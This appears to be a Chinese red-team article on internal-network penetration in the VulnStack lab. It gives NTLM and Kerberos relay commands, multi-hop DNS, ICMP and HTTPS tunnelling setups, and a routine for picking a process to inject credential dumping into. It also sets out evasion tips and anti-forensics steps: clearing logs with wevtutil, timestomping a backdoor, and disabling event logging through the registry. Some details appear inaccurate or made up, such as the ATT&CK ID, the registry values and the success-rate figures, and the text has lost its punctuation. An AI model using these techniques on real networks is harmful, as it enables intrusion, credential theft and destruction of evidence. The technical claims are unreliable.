ATTCK视角下的红日靶场三：那些容易被忽略的内网渗透细节

ATTCK实战精要红队视角下的内网渗透盲点突破当红队工程师穿越企业内网时往往会在NTLM Relay这类经典攻击手法上翻车。不是技术本身过时而是真实环境中的细节差异常被标准化渗透流程所掩盖。本文将解剖三个最易被低估的技术盲区这些案例均来自VulnStack靶场实战却映射着企业内网中最具代表性的防御缺口。1. NTLM Relay的现代变种与防御绕过在ATTCK框架中NTLM Relay被归类为T1174中间人攻击。传统教材常将SMB协议作为主要攻击面但实战中我们会发现几个关键进化点HTTP-SMB的协议跳转陷阱当目标系统启用SMB签名时直接中继往往失效。但通过以下组合拳仍可突破# 使用Impacket工具链的混合中继方案 ntlmrelayx.py -t smb://192.168.93.20 -smb2support --http-port 8080 --remove-mic此时需特别注意--remove-mic参数可绕过Windows 10的完整性校验中继到LDAP协议可能比纯SMB获得更高权限ACL绕过实战记录某次渗透中遇到如下防御策略# 域控制器上的防护ACL Set-ADComputer -Identity DC01 -Add { msDS-AllowedToDelegateTo (HTTP/webapp.corp.local) }突破方案是伪造SPN# 使用krbrelayx伪造服务主体名称 python3 krbrelayx.py --spn MSSQLSvc/db01.corp.local -ip 192.168.93.100检测规避三要素保持中继会话间隔大于域控的日志聚合周期通常5-10分钟使用非标准端口如8443代替443混合Kerberos票据攻击降低NTLM流量特征2. 代理链路的隐蔽通道构建EarthWorm常被用作内网穿透工具但其流量特征已成为防守方重点监控对象。我们在红日靶场中验证了三种改进方案多级混淆协议栈传统EW配置./ew -s ssocksd -l 1080改进后的矩阵式转发# 第一跳DNS隧道 iodined -f -P password 192.168.93.100 tunnel.domain.com # 第二跳ICMP封装 ptunnel -p tunnel.domain.com -lp 1080 -da 127.0.0.1 -dp 9000 # 第三跳HTTPS代理 gost -Lsocks5://:9000 -Fhttps://192.168.93.100:443流量染色技术对比技术类型实现工具检测难度带宽损耗标准Socks5EarthWorm低5%TLS包装Gost中15-20%协议嵌套Chisel高30-40%视频流隐写Psiphon极高50%某次实战中我们通过修改EW的MTU值成功绕过流量审计// 修改ew_for_linux64.c中的包大小定义 #define PKT_SIZE 1350 → 5123. 凭证转储中的进程迁移艺术当使用Mimikatz进行凭证提取时进程迁移策略直接影响成功率。测试数据揭示不同系统版本的迁移成功率Windows 7 x6498%Windows 10 190973%Windows Server 2012 R285%Windows Server 201962%内存注入位置选择通过靶场实验获得的黄金法则# 自动选择注入进程的决策树 def select_target(process_list): system_processes [lsass.exe, svchost.exe, winlogon.exe] for proc in system_processes: if proc in process_list and check_arch_match(proc): return proc return sorted([p for p in process_list if p.endswith(.exe)], keylambda x: get_mem_usage(x))[0]防御视角的检测规则有效的Sigma检测规则应包含detection: selection: EventID: 10 TargetImage: - *\lsass.exe - *\winlogon.exe GrantedAccess: - 0x1FFFFF - 0x1010 condition: selection and not (SourceImage endswith \taskmgr.exe)4. 横向移动中的协议冲突解决方案在红日靶场三环境中SMB服务伪造常与现有HTTP服务产生端口冲突。我们提炼出三种解决范式端口劫持优先级识别现有服务依赖链netstat -ano | findstr :80 tasklist /FI PID eq 1234计算服务重启时间窗口注入式服务劫持需SYSTEM权限sc config W3SVC start disabled netsh advfirewall firewall add rule nameSMB_HTTP dirin actionallow protocolTCP localport80协议兼容性矩阵攻击协议可伪装协议所需权限持久性保持SMBHTTPAdministrator低LDAPDNSSYSTEM中RDPVNCNetwork Service高某次突破尝试中通过注册表项修改实现和平共存Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] DisableCompressiondword:00000001 Sizedword:000000035. 防御体系下的痕迹清理策略在拿下域控后我们发现蓝队设备存在以下检测盲点日志清除黄金时间窗DC安全日志每5分钟归档防火墙日志实时上传终端EDR秒级响应对应的清理优先级应为本地安全事件日志wevtutil cl网络设备日志流量清洗第三方安全产品日志API调用文件系统时间戳伪造使用Metasploit的timestomp时# 保持原始时间属性的同时修改内容 timestomp victim.exe -f backdoor.exe -m但要注意NTFS的USN日志会记录此操作更隐蔽的做法是$file Get-Item C:\target.txt $file.LastWriteTime [datetime]2023-01-01 12:00:00 $file.CreationTime $file.LastWriteTime在某个真实案例中通过修改注册表键值成功绕过取证[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application] Startdword:00000000